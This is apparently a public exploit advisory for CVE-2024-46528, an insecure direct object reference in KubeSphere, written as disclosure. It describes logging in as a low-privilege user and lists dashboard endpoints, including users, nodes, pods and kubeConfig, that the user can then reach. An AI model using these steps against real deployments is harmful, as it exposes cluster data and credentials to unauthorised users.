# Exploit Title: KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR)
# Date: 3 September
# Exploit Author: Okan Kurtulus
# Vendor Homepage: https://kubesphere.io
# Software Link: https://github.com/kubesphere/kubesphere
# Version: [>= 4.0.0 & < 4.1.3] , [>= 3.0.0 & < 3.4.1]
# Tested on: Ubuntu 22.04
# CVE : CVE-2024-46528
1-) Log in to the system with a user who is not registered to any workspace (e.g., a "platform-regular" user who has limited authorization).
Note: The authorization level of this user is as follows:
"Cannot access any resources before joining a workspace."
2-) After logging in with this user, it has been observed that cluster information, node information, users registered in the system, and other similar areas can be accessed without the user being registered to any workspace or cluster.
Examples of accessible endpoints:
http://xxx.xxx.xx.xx:30880/clusters/default/overview
http://xxx.xxx.xx.xx:30880/clusters/default/nodes
http://xxx.xxx.xx.xx:30880/access/accounts
http://xxx.xxx.xx.xx:30880/clusters/default/monitor-cluster/ranking
http://xxx.xxx.xx.xx:3 0880/clusters/default/monitor-cluster/resource
http://xxx.xxx.xx.xx:30880/clusters/default/projects
http://xxx.xxx.xx.xx:30880/clusters/default/nodes/minikube/pods
http://xxx.xxx.xx.xx:30880/clusters/default/kubeConfig
